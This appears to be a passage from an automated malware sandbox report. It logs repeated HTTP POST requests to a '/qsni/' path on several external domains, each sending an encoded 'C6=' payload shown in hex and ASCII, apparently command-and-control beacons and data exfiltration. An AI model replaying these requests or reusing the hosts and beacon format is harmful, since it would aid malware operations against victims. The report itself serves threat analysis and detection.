59 4e 6c 41 67 67 67 51 30 72 4b 73 6b 30 6b 4c 4d 59 76 6f 4a 72 47 70 38 37 78 36 77 6d 63 67 55 51 73 5f 6d 6f 38 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.laksiricargo.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.laksiricargo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.laksiricargo.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 33 76 65 77 34 6d 6d 41 31 36 43 49 50 4b 34 39 57 44 6d 54 67 5f 4f 35 54 45 52 6f 57 4f 4a 65 37 74 28 4d 33 72 47 6b 35 6a 77 64 6a 6b 4d 5a 77 31 71 68 72 36 5a 34 37 6b 7e 55 28 47 71 71 6c 5f 78 6d 54 7a 73 43 4a 65 52 72 62 48 69 59 59 32 4d 45 6e 42 67 73 75 6e 6d 78 33 31 61 7a 7a 66 31 43 61 4a 36 6e 4b 71 30 46 30 37 43 74 43 50 70 36 4e 71 54 7a 54 46 4c 72 67 7a 39 35 79 6c 31 2d 78 78 4c 4a 54 51 72 42 7e 55 38 69 71 52 76 6a 41 6d 6c 6c 41 66 6b 4d 46 68 6d 5a 7e 69 6e 34 70 70 39 42 72 34 53 54 39 4c 67 4e 67 75 63 74 68 42 77 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=3vew4mmA16CIPK49WDmTg_O5TERoWOJe7t(M3rGk5jwdjkMZw1qhr6Z47k~U(Gqql_xmTzsCJeRrbHiYY2MEnBgsunmx31azzf1CaJ6nKq0F07CtCPp6NqTzTFLrgz95yl1-xxLJTQrB~U8iqRvjAmllAfkMFhmZ~in4pp9Br4ST9LgNgucthBw.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.laksiricargo.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.laksiricargo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.laksiricargo.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 33 76 65 77 34 6d 6d 41 31 36 43 49 64 36 6f 39 55 69 6d 54 6e 66 4f 36 51 45 52 6f 63 75 4a 61 37 74 6a 4d 33 71 53 30 34 51 63 64 6b 30 38 5a 68 57 53 68 74 36 5a 34 71 45 28 63 68 32 72 5f 6c 37 51 56 54 32 51 34 4a 59 4a 72 61 6b 4b 59 61 30 55 48 76 52 67 75 28 58 6d 79 33 31 62 70 7a 62 52 47 61 4a 75 5a 4b 71 4d 46 33 4f 57 74 4b 66 70 35 43 4b 54 7a 54 46 4c 33 67 7a 38 71 79 6c 63 34 78 30 72 5a 53 6a 7a 42 35 30 63 69 72 7a 48 6b 47 6d 6c 68 44 66 6c 77 4f 6a 37 2d 7e 68 75 67 67 71 35 38 33 5a 6e 5f 78 36 64 5f 79 4f 38 77 30 46 55 6b 6c 71 36 78 46 6b 63 4d 56 76 56 6e 72 6d 63 6b 45 37 54 67 59 49 5a 32 74 74 31 65 76 38 49 45 58 54 4d 50 33 39 31 54 4a 7a 76 5f 36 32 34 76 54 58 6a 30 69 56 71 44 58 53 5a 41 5a 47 53 56 62 53 36 52 77 44 38 32 45 64 39 4e 6d 4a 32 4f 43 69 36 58 28 58 64 32 64 5a 71 39 4b 41 44 79 49 66 63 64 79 63 75 6b 6e 32 48 4a 48 34 28 78 5a 62 4a 38 33 67 37 79 58 46 5a 50 6f 38 36 64 6a 6e 68 6a 59 68 65 6e 66 77 61 63 34 6e 48 61 72 6a 76 49 4e 61 57 74 37 73 71 33 31 68 50 68 65 65 42 76 5a 50 31 7a 66 39 6c 6c 28 38 4b 79 70 51 63 43 32 31 48 36 31 5f 59 6f 44 5a 78 66 6d 39 7a 4f 51 50 74 44 6b 61 4c 6b 53 62 57 4d 38 46 76 36 76 78 42 67 76 69 4c 5a 50 59 6c 64 39 56 37 65 4e 5a 79 69 6b 55 28 4f 31 43 33 33 76 51 4e 73 58 71 42 68 74 6f 59 66 79 32 4d 30 69 78 28 61 74 37 52 4a 4e 53 62 45 35 48 39 6f 49 62 49 6f 58 32 65 6f 43 34 52 48 66 4f 6c 34 44 75 54 49 31 56 73 36 4d 78 33 74 39 75 78 2d 33 4b 6c 64 4d 58 47 77 75 2d 79 61 71 49 38 50 45 6c 30 37 51 62 51 4f 39 63 49 2d 4e 49 48 59 55 76 77 48 53 75 4e 32 48 6c 53 76 75 73 55 47 6e 4e 4d 6e 44 41 74 59 53 51 6b 72 65 67 49 6f 69 76 35 4e 6b 59 67 73 51 6a 67 45 74 45 33 34 75 6d 6a 4a 77 39 63 41 4d 71 63 78 78 57 57 47 45 75 72 61 30 6c 4f 4c 72 7a 49 78 67 6d 77 74 70 46 33 6f 6f 47 56 36 52 52 39 6c 6b 56 70 71 37 58 48 78 4a 4c 7e 75 42 4d 51 51 74 30 41 75 30 75 37 75 56 66 7a 39 4c 77 7e 39 32 66 28 43 4d 5a 71 75 66 6e 52 64 4e 61 71 6c 55 39 42 68 43 5f 6a 48 30 62 66 48 33 6e 37 7a 64 54 4e 4b 31 35 7e 4b 63 4c 51 52 36 46 28 49 70 4c 4a 46 49 78 79 64 5a 34 56 6c 54 61 41 6a 7e 31 73 61 46 32 41 6e 4f 43 72 73 30 6d 4f 72 41 6d 6e 43 42 4d 31 38 35 4a 6b 74 33 79 6a 37 61 69 7e 4a 75 72 34 76 73 73 39 5f 61 46 32 46 55 58 45 53 53 75 36 43 6f 32 73 47 39 5a 4c 45 57 61 6b 67 58 41 53 70 71 43 39 4b 36 4d 31 36 67 4c 61 79 36 30 6c 79 65 39 52 4a 31 72 55 73 58 69 41 43 4e 6f 73 38 42 59 64 79 77 34 70 6b 58 2d 77 76 41 74 34 47 78 55 33 41 45 45 4f 4e 79 78 74 7a 79 56 28 42 37 66 71 55 39 64 46 6f 59 5a 32 41 56 77 50 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.smirnovmir.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.smirnovmir.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.smirnovmir.online/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 49 69 33 50 63 74 75 4a 66 71 4d 65 6d 34 51 72 50 48 4e 6b 4a 31 44 6d 77 49 75 76 72 73 32 7a 36 44 55 4e 39 76 72 66 55 34 70 77 56 43 71 46 76 62 43 6e 44 5f 67 48 67 4d 42 71 56 47 44 68 77 53 53 4d 58 4f 73 46 45 64 4e 78 79 67 75 35 46 5a 66 48 43 68 38 64 34 62 6c 36 62 66 53 66 75 31 78 56 35 6d 39 37 55 5f 66 63 52 68 79 71 37 54 63 66 33 54 6f 78 47 71 76 70 4e 69 31 33 49 4f 6a 51 46 35 53 6b 67 45 35 59 5a 37 59 75 50 77 79 59 51 55 4d 6c 51 68 62 6b 76 63 70 36 6c 4f 73 32 57 6d 47 73 4e 50 62 32 48 36 44 35 28 73 6b 75 34 56 49 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=Ii3PctuJfqMem4QrPHNkJ1DmwIuvrs2z6DUN9vrfU4pwVCqFvbCnD_gHgMBqVGDhwSSMXOsFEdNxygu5FZfHCh8d4bl6bfSfu1xV5m97U_fcRhyq7Tcf3ToxGqvpNi13IOjQF5SkgE5YZ7YuPwyYQUMlQhbkvcp6lOs2WmGsNPb2H6D5(sku4VI.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.smirnovmir.onlineConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.smirnovmir.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.smirnovmir.online/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 49 69 33 50 63 74 75 4a 66 71 4d 65 6c 5a 67 72 44 41 52 6b 65 6c 44 6e 75 59 75 76 79 38 32 6f 36 44 51 4e 39 71 62 31 55 71 46 77 56 52 7e 46 73 35 61 6e 4f 66 67 48 33 38 42 75 52 47 43 69 77 53 47 41 58 4f 63 56 45 65 39 78 30 48 69 35 53 4c 48 45 4a 78 38 66 76 37 6c 37 62 66 53 77 75 7a 52 52 35 6d 35 64 55 5f 6e 63 52 56 4b 71 38 6a 63 63 75 7a 6f 78 47 71 76 31 4e 69 31 50 49 4e 53 4e 46 38 47 30 67 79 39 59 61 61 34 75 44 78 79 58 42 6b 4e 73 50 52 61 78 6a 76 59 4c 39 76 70 4e 59 31 4f 50 66 5f 58 4a 46 4b 69 41 67 50 4a 72 69 69 63 34 68 64 46 37 39 68 58 6f 48 67 71 31 30 5a 39 30 62 54 4d 4a 4d 66 58 50 4f 44 64 5f 36 64 6d 66 66 34 75 46 6d 6f 66 78 67 6e 37 65 64 4a 32 51 4d 31 67 30 4d 69 39 39 59 53 78 78 74 39 6d 77 6f 43 61 67 4a 69 6f 71 41 2d 49 47 43 73 64 7a 6b 42 34 61 33 4d 42 75 33 65 4e 6f 4e 66 36 34 74 62 67 47 78 64 58 43 7a 6d 6d 44 52 6a 4e 6a 4b 68 44 79 6e 65 67 72 70 65 71 34 51 44 7a 6c 75 4d 68 66 37 73 54 37 6d 45 66 35 61 4c 41 6c 33 68 28 46 4a 35 48 36 35 56 33 5f 68 46 38 52 74 6d 66 6e 69 78 75 67 49 76 6d 46 74 77 51 32 37 6b 64 38 4c 6e 6b 52 43 62 54 70 79 35 51 5f 32 5f 4a 2d 52 4c 61 66 7a 38 4d 5a 33 78 35 70 51 51 51 49 41 59 43 6b 62 68 62 68 76 57 62 33 34 44 28 34 52 79 44 4d 43 5a 31 4c 63 53 4d 6c 58 74 28 34 34 47 78 32 6d 4c 4f 32 71 6c 54 75 6c 4f 6d 6a 63 36 6c 61 38 61 44 56 43 4a 36 61 38 30 55 6a 79 52 46 66 73 51 79 48 65 5f 62 39 7e 4f 34 2d 79 36 65 42 4c 71 7a 77 7e 74 44 5f 42 6b 4c 6e 72 70 56 48 39 61 6b 42 39 30 6e 6f 4f 32 6d 6c 36 32 38 4a 54 4a 6d 58 5a 57 46 72 6a 62 79 47 51 50 72 33 37 47 38 72 6d 31 6d 42 6c 55 47 70 75 42 63 75 55 50 6e 65 7a 46 48 37 65 4f 53 51 77 62 48 67 55 46 37 51 42 4a 7e 53 6b 6b 75 7a 4e 66 52 70 47 65 61 67 28 63 55 33 78 62 33 4b 69 5f 55 73 70 6e 78 56 56 46 7a 4c 4c 37 50 6c 66 4a 34 75 4a 65 48 66 28 56 46 4a 36 38 43 4e 61 69 37 69 6d 4c 63 4a 78 43 57 37 33 32 65 56 61 32 6c 74 34 55 77 57 63 5a 7a 65 4b 6b 32 46 65 7a 64 6c 39 6c 5a 70 75 6a 31 41 30 32 61 67 61 64 77 42 72 65 4d 43 53 41 73 65 37 4c 61 75 4c 38 4d 71 46 65 51 45 50 61 31 4b 73 54 62 2d 35 69 53 47 4b 54 7a 32 55 4f 63 71 6b 51 6d 61 79 4a 43 32 54 6c 68 72 78 4d 28 46 34 59 4f 51 58 72 31 57 58 33 43 4f 73 7a 35 49 43 46 54 38 74 4b 64 6e 6c 56 64 51 44 47 55 6e 28 4a 7a 54 28 35 63 69 6b 50 55 6e 6b 62 68 6a 73 54 6b 73 72 44 44 55 33 35 77 64 70 56 4a 41 51 6c 33 73 54 78 72 50 34 6e 68 43 4f 4c 31 6c 57 5a 5a 50 7a 63 6b 6a 68 58 4b 72 52 35 37 65 38 71 72 6f 72 33 6c 75 50 36 53 74 76 61 32 42 31 70 77 45 57 5a 76 34 43 62 4a 53 6b 69 63 68 4a 65 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.eylien.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.eylien.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.eylien.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 64 64 73 6e 31 38 73 70 49 30 52 48 36 47 6d 41 73 63 63 73 41 4f 50 79 37 64 45 52 32 4d 75 74 33 32 37 51 75 30 59 31 76 79 52 2d 45 58 66 56 72 79 72 7a 4a 59 51 78 71 44 38 50 52 6a 34 6d 54 69 59 61 6f 36 57 58 73 37 6d 67 48 6a 38 54 51 6e 78 76 69 4b 57 55 31 62 5a 59 62 6e 33 39 57 36 62 47 43 4e 41 4d 6b 68 37 4a 56 58 4a 42 75 43 36 73 52 45 70 67 6f 4c 6a 79 4d 49 6b 6b 34 58 39 37 32 31 39 4c 55 44 54 33 49 2d 46 4f 45 64 53 65 52 47 47 6e 4b 79 68 75 73 75 36 52 64 4c 4d 6b 47 33 72 5a 6a 5a 69 79 34 68 43 67 69 6a 61 79 4e 32 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=ddsn18spI0RH6GmAsccsAOPy7dER2Mut327Qu0Y1vyR-EXfVryrzJYQxqD8PRj4mTiYao6WXs7mgHj8TQnxviKWU1bZYbn39W6bGCNAMkh7JVXJBuC6sREpgoLjyMIkk4X97219LUDT3I-FOEdSeRGGnKyhusu6RdLMkG3rZjZiy4hCgijayN2M.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.eylien.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.eylien.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.eylien.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 64 64 73 6e 31 38 73 70 49 30 52 48 36 6d 57 41 75 5f 30 73 48 75 50 7a 31 39 45 52 6a 63 76 6b 33 33 48 51 75 78 6f 66 76 48 42 2d 45 67 44 56 72 51 54 7a 4c 59 51 78 39 54 38 44 4d 7a 35 6a 54 6d 78 72 6f 5f 72 69 73 34 4b 67 64 45 77 54 53 6c 5a 73 71 61 57 61 78 62 5a 62 62 6e 32 5f 57 38 37 5a 43 4e 4d 31 6b 68 6a 4a 56 6c 68 42 6f 79 36 74 65 6b 70 67 6f 4c 6a 32 4d 49 6b 68 34 58 6b 38 32 30 6c 39 55 31 58 33 47 5f 6c 4f 43 36 48 49 58 47 47 6a 55 69 68 39 39 4c 4c 63 62 34 38 68 51 32 79 36 38 49 36 4f 35 52 4f 77 77 54 36 76 4d 6a 61 6d 75 46 51 31 7a 79 4f 43 6b 51 31 4b 38 37 4e 6a 7e 33 34 6b 69 42 4d 39 67 47 6f 62 34 32 58 72 6c 39 68 4f 61 78 59 4e 45 62 35 43 47 4f 35 59 39 39 55 74 6d 6d 28 53 52 32 71 43 28 37 75 53 73 53 4c 4b 33 47 51 38 56 33 38 36 4b 49 39 67 53 76 50 56 43 65 56 59 6c 70 31 6d 46 72 4a 7a 68 72 6c 41 44 45 75 52 48 7a 59 4c 46 43 31 6c 57 56 62 75 31 58 34 4c 38 6f 30 2d 54 4c 75 42 28 41 77 78 6a 70 50 2d 6c 34 30 79 37 2d 31 68 53 6b 73 42 44 6c 6e 63 7e 5f 33 6d 42 79 6f 51 36 79 70 56 55 6d 43 34 45 7a 51 78 7e 37 56 7a 49 61 39 52 6b 5a 61 38 4b 75 47 4c 4e 77 6d 56 53 4d 58 2d 43 48 35 63 72 4a 79 30 62 54 63 72 73 68 4e 44 73 31 4a 4f 76 44 76 57 4b 35 7a 42 4c 34 4e 59 43 35 30 68 44 66 6e 43 55 61 51 79 71 48 46 6e 35 49 72 48 65 58 4c 7a 6e 4b 33 68 28 71 74 64 55 5a 35 30 55 30 43 61 4e 4a 66 74 31 65 37 37 32 44 30 31 51 62 51 4c 54 6b 6e 59 51 54 6c 76 7e 72 7e 62 7e 32 56 43 50 4d 6b 75 57 62 32 71 37 56 51 37 4e 30 30 37 4b 48 79 41 6a 5f 62 54 55 53 6a 55 45 66 32 78 46 5f 6f 46 45 70 4a 6a 39 45 48 38 49 57 67 2d 44 6b 49 72 39 53 74 75 39 58 36 7a 63 58 66 42 4d 77 77 64 7a 39 46 50 4a 6f 69 77 4f 45 63 4d 71 51 31 41 65 6e 30 35 4f 38 62 6a 7e 76 61 74 4f 4c 57 63 73 5f 6e 6a 76 53 5a 6e 58 41 54 4f 75 68 4b 30 39 56 32 4d 5a 6d 71 45 28 36 54 69 79 45 6d 79 56 5a 72 63 4e 31 49 44 53 69 4a 54 6e 5a 31 2d 6d 30 58 32 55 79 42 52 48 6c 79 4a 4d 78 6f 6d 51 64 36 47 71 44 78 38 43 49 45 6e 6a 6c 38 4a 51 71 56 31 67 63 79 78 72 57 66 6f 76 34 54 71 36 4a 6c 39 32 63 50 58 33 72 51 35 52 6b 42 6d 72 7a 5a 69 35 51 28 2d 56 49 7a 6d 79 57 38 39 42 50 59 58 35 4a 6a 46 50 33 6d 42 70 4c 6f 35 51 65 32 51 70 52 4c 4e 38 68 65 39 30 31 73 74 78 70 32 51 67 39 58 4c 49 42 46 4e 51 73 65 4b 50 4e 46 4c 33 79 6f 34 51 74 71 43 30 2d 67 41 44 48 58 54 6e 5a 45 6d 4e 45 7a 38 4d 52 35 76 73 62 69 48 47 63 6c 67 28 56 4e 51 30 61 6c 38 31 76 71 39 4e 59 46 6e 59 54 69 62 57 6e 59 75 66 72 6b 4f 37 33 73 37 69 68 6f 66 46 2d 4f 48 55 63 5a 30 5a 38 6c 5f 4e 61 33 78 44 5a 78 75 6d 76 38 4a 4b 56 67 45 42 3
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.goosedigitals.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.goosedigitals.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.goosedigitals.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 6c 4e 61 4c 63 67 73 54 28 56 62 57 70 52 52 39 66 63 58 69 70 62 31 69 33 2d 64 4d 59 77 41 32 69 77 71 42 44 51 53 50 53 6b 46 32 75 48 4d 71 63 39 64 6a 47 58 62 33 32 6d 34 53 4e 6b 6e 52 49 6e 4f 71 69 36 52 71 35 59 39 32 47 77 70 51 68 76 32 55 6b 6b 73 5f 31 67 34 74 4f 59 43 42 59 38 32 67 33 5a 75 39 38 48 44 2d 70 5f 38 4e 63 48 6a 68 79 69 73 49 70 52 55 44 42 4c 54 68 79 39 77 6e 37 6a 7e 62 77 6c 6f 7a 66 35 4a 62 66 76 6c 50 55 4f 6b 79 38 56 46 47 37 38 6e 67 73 68 4a 61 77 61 66 52 6d 37 37 39 4f 45 42 5f 52 64 72 72 4f 37 30 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=lNaLcgsT(VbWpRR9fcXipb1i3-dMYwA2iwqBDQSPSkF2uHMqc9djGXb32m4SNknRInOqi6Rq5Y92GwpQhv2Ukks_1g4tOYCBY82g3Zu98HD-p_8NcHjhyisIpRUDBLThy9wn7j~bwlozf5JbfvlPUOky8VFG78ngshJawafRm779OEB_RdrrO70.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.goosedigitals.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.goosedigitals.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.goosedigitals.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 6c 4e 61 4c 63 67 73 54 28 56 62 57 34 42 68 39 64 37 44 69 6f 37 31 68 35 65 64 4d 52 51 41 79 69 77 6d 42 44 56 71 6c 53 57 70 32 74 55 30 71 63 66 46 6a 56 48 62 33 6e 47 34 57 44 45 6e 39 49 6e 61 63 69 37 68 36 35 64 6c 32 55 68 35 51 77 64 65 54 38 6b 73 35 28 41 34 79 4f 59 43 55 59 38 47 6b 33 5a 6a 31 38 48 62 2d 71 4a 49 4e 59 48 69 33 75 79 73 49 70 52 56 52 42 4c 53 77 79 37 59 4a 37 68 4f 79 77 54 73 7a 59 64 56 62 59 4d 64 4d 57 4f 6b 32 67 6c 45 6d 37 63 6e 70 67 58 63 45 6d 5f 54 42 7a 59 76 32 4c 47 51 48 44 64 33 31 59 76 47 31 52 76 35 59 52 45 5a 4c 72 5f 6b 4d 52 46 54 61 41 5f 72 66 6f 43 59 6d 71 5f 34 32 43 45 7a 33 4c 57 55 6a 47 43 50 59 6d 4a 6b 66 71 58 79 63 73 69 37 49 63 30 68 4e 4a 77 61 45 34 50 4f 5f 34 61 61 4e 74 51 69 6d 7e 44 7e 31 6c 4b 67 62 6e 4b 28 44 49 6d 52 68 49 4d 42 62 74 39 41 63 48 6d 68 50 58 74 39 53 36 39 51 6c 6c 42 48 30 4a 78 47 30 38 37 4d 78 55 72 67 55 44 78 4b 62 35 45 61 41 70 51 7a 73 6b 42 6f 79 50 36 41 48 49 61 43 53 39 4e 64 6d 79 4b 76 6f 34 71 6f 65 58 39 78 31 42 33 6d 49 55 44 6e 4e 5a 4e 6e 37 34 65 7e 47 38 59 69 57 69 52 73 66 62 4c 31 33 6a 55 55 4d 41 36 6c 49 77 61 38 37 65 38 38 54 54 43 4a 4e 31 45 76 48 7e 6c 59 77 59 58 36 48 34 6c 50 33 50 38 75 4b 47 4a 61 59 72 49 6f 61 66 36 53 45 6c 34 50 56 34 61 64 65 35 50 43 53 4f 4e 65 32 4b 45 56 69 72 53 43 46 70 49 68 63 49 5a 77 45 28 39 46 39 4d 57 44 75 37 73 36 38 4a 4d 73 33 72 65 6a 49 42 61 72 67 47 35 72 47 67 33 30 63 31 68 79 4d 52 52 61 77 37 38 71 72 76 4d 7e 39 75 34 6b 35 4c 5a 72 54 35 68 50 4f 44 68 4f 70 38 65 5a 74 58 30 43 62 72 4d 6e 59 77 4a 71 46 38 75 65 38 41 67 58 43 6c 4c 7a 73 72 55 6c 66 55 4f 33 31 6f 4a 4f 67 38 63 42 6d 52 79 4f 37 42 73 63 71 53 2d 28 4f 49 6e 4f 48 6f 70 61 41 70 64 6a 37 6b 66 68 78 51 75 62 46 59 6d 6b 5a 48 54 77 47 58 50 45 6f 6f 79 46 66 4e 4c 35 67 6a 69 39 51 4c 67 66 4e 65 74 50 32 6c 58 4c 5f 62 70 6f 6d 44 74 4a 35 47 72 70 52 64 33 4f 38 77 4f 7a 51 68 65 37 6e 35 65 66 4f 4d 78 35 4a 56 45 56 56 6d 70 63 57 37 5f 57 4e 75 76 64 61 59 58 62 57 71 36 45 62 4b 54 59 51 70 6e 59 44 4a 6c 59 2d 78 79 4e 48 68 4b 7e 32 65 34 78 79 54 79 77 41 6a 54 65 6c 69 6b 70 48 42 38 6e 79 45 65 52 69 34 74 30 57 4e 49 54 49 58 48 28 34 4d 64 49 4d 53 37 63 70 52 4e 71 65 32 70 71 68 4d 33 66 73 6a 50 41 6b 45 44 4a 51 4c 44 33 62 35 42 31 38 7e 76 41 75 44 6b 73 7a 6b 49 7e 71 39 4b 7a 32 34 61 64 38 33 31 79 66 47 4d 4d 5a 43 5f 55 61 51 75 6b 58 67 45 4b 2d 45 6b 4d 41 64 50 70 6b 51 41 75 55 66 45 4e 2d 32 33 30 56 6b 49 38 78 50 52 7a 2d 7e 71 4d 32 66 45 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.hexiemoju.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.hexiemoju.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hexiemoju.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 6b 2d 42 41 57 66 55 4f 34 4e 33 39 6e 71 76 42 56 6d 66 79 59 4f 32 65 47 49 59 53 7a 6b 52 53 69 4b 63 34 62 72 37 32 74 34 4e 55 35 55 66 42 51 66 37 57 4e 77 75 34 50 4f 69 78 32 4e 61 74 52 6c 43 56 62 76 74 6c 63 75 4b 73 73 45 51 58 44 78 4c 42 65 32 59 62 74 77 68 47 37 32 39 42 41 79 76 47 30 77 6e 6f 75 65 5a 65 46 32 28 5a 4e 79 71 75 59 62 33 57 68 6c 33 31 50 4f 73 75 71 38 44 71 63 41 33 37 61 38 69 6d 6f 4e 5a 53 6e 67 62 6b 76 2d 4f 6f 6f 6f 6a 50 4c 64 79 77 75 44 58 4c 69 75 59 61 71 65 36 37 4f 61 70 36 38 35 71 52 7e 78 34 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=k-BAWfUO4N39nqvBVmfyYO2eGIYSzkRSiKc4br72t4NU5UfBQf7WNwu4POix2NatRlCVbvtlcuKssEQXDxLBe2YbtwhG729BAyvG0wnoueZeF2(ZNyquYb3Whl31POsuq8DqcA37a8imoNZSngbkv-OooojPLdywuDXLiuYaqe67Oap685qR~x4.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.hexiemoju.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.hexiemoju.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hexiemoju.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 6b 2d 42 41 57 66 55 4f 34 4e 33 39 6d 4c 66 42 47 58 66 79 5a 75 32 66 4a 6f 59 53 36 45 52 57 69 4b 51 34 62 71 76 41 74 4b 68 55 35 6a 37 42 58 36 50 57 65 41 75 34 4a 4f 69 31 75 74 61 42 52 6c 6e 71 62 75 63 51 63 73 6d 73 73 6a 4d 58 46 7a 54 4f 56 6d 59 5a 36 67 68 4a 37 32 38 44 41 7a 66 43 30 77 6a 53 75 65 78 65 46 67 6a 5a 49 43 71 76 47 72 33 57 68 6c 33 70 50 4f 73 57 71 34 6e 4d 63 43 47 6d 61 50 36 6d 6f 6f 6c 53 68 48 33 6e 34 75 4f 6b 69 49 69 4b 44 5f 6e 35 74 43 7e 31 76 4f 38 4b 7a 5f 57 45 4f 4b 45 6d 37 61 69 67 38 58 59 5a 67 50 73 76 72 46 30 38 6b 30 46 6c 54 68 6b 75 67 74 69 72 58 38 66 72 57 30 6f 2d 53 68 62 76 33 4e 42 56 63 56 41 42 44 4f 4d 56 5a 53 33 64 33 4e 64 66 75 63 36 61 61 64 6e 72 47 63 46 47 46 76 63 54 72 5a 52 41 73 61 66 58 7a 52 6c 73 4d 4a 47 49 72 35 67 32 54 44 39 51 56 6a 32 56 39 35 48 4d 44 4e 42 66 78 61 61 38 68 6e 69 6f 47 77 4c 49 61 76 69 43 4e 33 37 36 64 58 49 46 43 4e 61 52 6f 6d 36 76 56 78 4b 5a 43 4c 78 55 44 35 4b 37 45 70 57 48 53 78 4c 61 6a 64 4a 59 51 4e 6e 46 4d 42 76 58 79 7a 4a 46 39 70 49 56 5a 4d 66 72 4b 53 38 73 59 7a 74 54 39 77 78 47 71 67 6c 71 28 36 6b 5f 79 4a 32 56 63 57 55 52 48 72 59 4b 6d 68 6d 4e 4d 74 67 72 42 67 79 57 6d 4d 6d 75 66 54 6a 47 6d 65 77 41 69 33 64 47 34 45 72 7a 54 45 61 51 73 53 48 51 66 48 57 69 63 79 79 48 41 59 46 34 4f 4f 50 54 35 32 36 74 54 6e 34 4a 44 37 76 77 4f 56 75 68 7a 6a 6d 53 30 61 54 35 55 77 75 5f 58 7a 57 36 47 34 47 4b 64 4e 78 5f 58 34 5a 54 6e 6c 6d 4f 4c 37 36 51 56 58 6f 75 6d 6f 54 5a 54 53 51 45 6b 62 4e 71 36 42 4e 51 36 79 30 4a 6b 63 55 54 65 35 52 79 76 2d 6e 59 75 58 56 48 57 39 61 2d 37 56 78 46 6b 4e 74 4b 38 50 78 49 42 42 38 41 55 41 6b 34 7e 61 33 58 44 6b 4f 7a 69 33 4c 56 30 7a 65 52 4a 6b 57 62 38 75 63 54 31 2d 41 35 4b 67 36 68 46 4c 58 56 65 35 76 5a 42 77 4a 37 33 66 71 54 52 49 51 6b 7e 52 53 38 6d 56 6e 7a 35 56 35 4c 34 43 67 6f 62 69 6b 5a 67 47 6d 52 61 52 4e 55 49 62 6b 49 4e 30 65 5a 66 36 36 55 6d 74 4a 32 61 72 58 72 6f 32 4c 4e 71 6b 71 5f 79 4d 50 6e 50 39 6e 59 6d 52 28 45 36 4e 46 59 64 4a 4e 5f 35 36 51 72 77 34 70 66 57 32 35 53 73 63 28 39 73 53 49 4a 77 53 73 61 4e 35 47 31 7a 6e 79 44 4c 6f 31 68 6a 37 69 42 65 4d 59 57 78 4f 7a 47 67 65 4e 33 61 46 28 53 62 75 74 56 33 42 67 56 32 51 73 73 67 46 65 4a 4d 4f 4e 6c 63 41 74 38 75 71 77 55 69 51 4b 50 71 64 7e 38 4d 52 48 34 48 66 6d 32 73 65 66 73 68 45 49 49 79 79 69 79 